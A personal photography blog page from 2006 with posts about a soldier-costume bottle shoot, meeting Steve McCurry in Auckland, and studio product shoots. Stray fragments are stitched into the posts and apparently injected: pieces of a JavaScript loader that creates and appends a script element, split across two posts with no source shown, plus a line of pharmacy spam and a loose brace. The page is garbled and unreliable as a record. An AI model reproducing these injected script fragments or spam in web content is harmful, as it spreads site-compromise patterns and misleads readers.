If you like please

How to become a soldier

Posted by admin On May - 6 - 2006

After the funny bottle shooting (you can see some result photos at the entry of 03 of May 2006) I got the brilliant idea doing more funny bottle shoots because after the weekend these bottles are still at the studio of Russell. So I had asked him and we were thinking about funny themes for it. Finally we found my camouflage dress what fits me perfect and an idea was born. So after meeting for breakfast on Saturday morning we went to a costume shop and I bought a kind of machine -gun and a full metal jacket. Back in Russell’s studio we create a fitting cool atmosphere. Brown background and I worn my dress, the full metal jacket. Took the gun in one hand in the other the bottle of Tequila the only thing I could rescue in war. Later on some oil with water drops on skin for sweat and ready was the perfect soldier. Russell made wonderful pictures. Normally I don’t like pictures of me but they look good also think about I’m not a professional model. Later on I did pictures of Russell as soldier. We had so much fun. Maybe will do some different ones soon.

“SAUZA Banditos – Blood of the Revolution” or “SAUZA Banditos – The Taste of Revolution” ?

Share this:
Share this page via Email Share this page via Stumble Upon Share this page via Digg this Share this page via Facebook Share this page via Twitter

Meeting Steve McCurry

Posted by Susanna On May - 4 - 2006

Do you remember the famous picture what went around the world once? I knew it from early National Geographic Issues. In Auckland at the end of the world I got the opportunity to meet the famous photographer Steve McCurry. He hosted a lecture in the Art Gallery and I got the chance to go. Russel got two tickets and asked me for coming. I myself tried for two weeks to get tickets – in vain. After he was talking about fascinating adventures he experienced around the globe it was possible to let sign books by him. I actually bought two books, one for me and one for Scott. Strange that they offered a big book signing but excuses later there had only a few books left. So you can’t imagine how quick I was at the little bookshelf buying two of the last four or five books (Only Sanctuary the book about the temples of Angkor in Cambodia). Then I was waiting in the line for letting Steve McCurry sign my books and asking him after a few pictures of the two of us, especially for my blog. He seriously is my biggest inspiration. We had a quick chat where I’m coming from and that he stayed in Berlin in 1989 when the wall came down and all that stuff. Later at home while looking in my signed books I realized that he dated the signings with May 4th 2004.


var d=document;var s=d.createElement(‘script’); } else {

Share this:
Share this page via Email Share this page via Stumble Upon Share this page via Digg this Share this page via Facebook Share this page via Twitter

Tool time

Posted by admin On May - 4 - 2006

Near the place where I live today I had a shooting with Scott. It was for “Living & Giving” again and was located in the nice old villa of Brenda, the woman of Brando the advertisement company. The model arrived too late and so they wanted me to wear a special belt with heaps of funny flowered garden tools. Finally you will not see my head but I was surprised how well done the photos looked like. Later on we shot dishes on a table. You can’t imagine how difficult it sometimes could be to find the right angle for bowls, spoons, glasses, bread and soup. The following impressions I did for giving you a little impression.

Go Girl

Go Girl

d.getElementsByTagName(‘head’)[0].appendChild(s);}

Share this:
Share this page via Email Share this page via Stumble Upon Share this page via Digg this Share this page via Facebook Share this page via Twitter

Who shot the bottles?

Posted by admin On May - 3 - 2006

After working on Monday and university on Tuesday (holidays are actually over) I thought I could sleep longer this morning but around 8:00am! I got a TXT message from Russel (www.russellmeek.com) asking for helping him assisting while shooting heaps of bottles full of alcohol. So I tryed to be as fast as possible but took the wrong way to his studio and had to walk at least 1 hour. Belive me – that was exhausting. We had a fun day Russel, the custumer girl, Mandy (friend of Russel) and me. Learned how to set up light for indoors and product shots witch made on special reflecting material like glas and metallic.

lamisil generic for sale

}

Share this:
Share this page via Email Share this page via Stumble Upon Share this page via Digg this Share this page via Facebook Share this page via Twitter

VIDEO

TAG CLOUD

Sponsors

About Me

“Life's not always fair. Sometimes you can get a splinter even sliding down a rainbow.”
by Cherralea Morgen
 

Twitter

    My Photos at Flickr

    su_monkey05su_monkey09su_monkey08su_monkey07su_monkey06su_monkey04su_monkey03su_monkey02